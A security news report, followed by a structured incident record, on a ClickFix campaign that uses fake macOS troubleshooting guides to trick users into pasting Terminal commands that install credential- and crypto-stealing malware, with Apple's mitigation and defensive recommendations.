New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides
Microsoft’s Defender Security Research Team has uncovered a sophisticated cyberattack campaign leveraging a social engineering tactic called ClickFix to compromise Apple computers. Active since late 2025 and continuing into early 2026, the campaign tricks users into executing malicious commands under the guise of legitimate troubleshooting solutions.
Attackers distribute fake guides on platforms like Medium, Craft, and Squarespace, offering fixes for common issues such as disk space errors or system malfunctions. Instead of providing downloads, these sites instruct users to copy and paste commands into macOS Terminal, claiming they are system utilities or quick repairs. The guides are often multilingual and appear on websites that have since been taken down or reported.
Once executed, the commands bypass macOS security features like Gatekeeper, which typically only scans app bundles and disk images not direct Terminal inputs. The malware including AMOS (Atomic macOS Stealer), Macsync, and SHub Stealer then prompts users to enter their system password under the pretense of installing a "helper tool." If granted, attackers gain full access to sensitive files, settings, and credentials.
The malware targets a range of high-value data, including:
- iCloud and Telegram account credentials
- Private documents, notes, and photos under 2 MB
- Cryptocurrency wallet keys (Exodus, Ledger, Trezor)
- Saved browser passwords (Chrome, Firefox)
- Authentic crypto apps, which attackers replace with trojanized versions to monitor transactions and steal funds
The campaign employs fileless attack techniques, using tools like curl and osascript to run malware directly in memory, evading traditional antivirus detection. Microsoft also identified a kill switch in the malware that halts execution if a Russian keyboard layout is detected.
In response, Apple has introduced a security feature in macOS 26.4, which now displays a "Possible malware, Paste blocked" warning when users attempt to paste suspicious commands into Terminal. The update aims to mitigate the risk of unintentional execution of malicious scripts.
Source: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/
Squarespace TPRM report: https://www.rankiteo.com/company/squarespace
Medium TPRM report: https://www.rankiteo.com/company/medium-com
Apple TPRM report: https://www.rankiteo.com/company/apple
Craft TPRM report: https://www.rankiteo.com/company/nodecraft
"id": "squnodmedapp1778279131",
"linkid": "squarespace, nodecraft, medium-com, apple",
"type": "Cyber Attack",
"date": "11/2025",
"severity": "60",
"impact": "2",
"explanation": "Attack limited on finance or reputation"{'affected_entities': [{'industry': 'Technology, General Public',
'location': 'Global',
'name': 'Apple macOS Users',
'type': 'Individuals, Organizations'}],
'attack_vector': 'Fake troubleshooting guides, Terminal command execution',
'customer_advisories': 'Apple macOS users advised to update to version 26.4 '
'and avoid executing untrusted Terminal commands',
'data_breach': {'data_encryption': 'No (malware bypasses encryption via '
'direct access)',
'data_exfiltration': 'Yes',
'file_types_exposed': ['Documents',
'Photos (<2 MB)',
'Browser data',
'Cryptocurrency wallet files'],
'personally_identifiable_information': 'Yes (iCloud/Telegram '
'credentials, browser '
'passwords)',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Credentials',
'Personal documents',
'Cryptocurrency wallet keys',
'Browser passwords']},
'date_detected': '2025-10-01',
'date_publicly_disclosed': '2026-01-01',
'description': 'Microsoft’s Defender Security Research Team has uncovered a '
'sophisticated cyberattack campaign leveraging a social '
'engineering tactic called ClickFix to compromise Apple '
'computers. The campaign tricks users into executing malicious '
'commands under the guise of legitimate troubleshooting '
'solutions, leading to malware infections such as AMOS (Atomic '
'macOS Stealer), Macsync, and SHub Stealer.',
'impact': {'brand_reputation_impact': 'Potential reputational damage to Apple '
'due to security bypass',
'data_compromised': 'iCloud and Telegram credentials, private '
'documents, cryptocurrency wallet keys, '
'browser passwords',
'identity_theft_risk': 'High (credentials and personal data '
'compromised)',
'operational_impact': 'Unauthorized access to sensitive files and '
'settings',
'payment_information_risk': 'High (cryptocurrency wallet keys and '
'browser passwords compromised)',
'systems_affected': 'macOS systems'},
'initial_access_broker': {'backdoors_established': 'Malware persistence via '
'trojanized crypto apps',
'entry_point': 'Fake troubleshooting guides on '
'Medium, Craft, and Squarespace',
'high_value_targets': ['Cryptocurrency wallet users',
'iCloud/Telegram users']},
'investigation_status': 'Ongoing',
'lessons_learned': 'Need for enhanced macOS security to prevent '
'Terminal-based attacks, user education on social '
'engineering risks, and improved detection of fileless '
'malware.',
'motivation': 'Data theft, financial gain, credential harvesting',
'post_incident_analysis': {'corrective_actions': ['macOS update to block '
'suspicious Terminal paste '
'commands',
'Enhanced malware detection '
'for fileless attacks',
'User education on social '
'engineering risks'],
'root_causes': ['Social engineering via fake '
'troubleshooting guides',
'Bypass of macOS Gatekeeper via '
'direct Terminal input',
'Lack of user awareness on command '
'execution risks']},
'ransomware': {'data_encryption': 'No (malware steals data directly)',
'data_exfiltration': 'Yes'},
'recommendations': ['Update macOS to version 26.4 or later to enable Terminal '
'paste warnings',
'Avoid executing commands from untrusted sources',
'Use multi-factor authentication for sensitive accounts',
'Monitor for unauthorized access to cryptocurrency '
'wallets and browser data',
'Educate users on social engineering tactics'],
'references': [{'source': 'Microsoft Defender Security Research Team'}],
'response': {'containment_measures': 'Apple introduced a security feature in '
'macOS 26.4 to block suspicious Terminal '
'paste commands',
'remediation_measures': 'macOS update (26.4) with Terminal paste '
'warnings, malware detection and removal',
'third_party_assistance': 'Microsoft Defender Security Research '
'Team'},
'title': 'New ClickFix Social Engineering Campaign Targets macOS Users with '
'Fake Troubleshooting Guides',
'type': 'Social Engineering, Malware',
'vulnerability_exploited': 'Bypass of macOS Gatekeeper via direct Terminal '
'input'}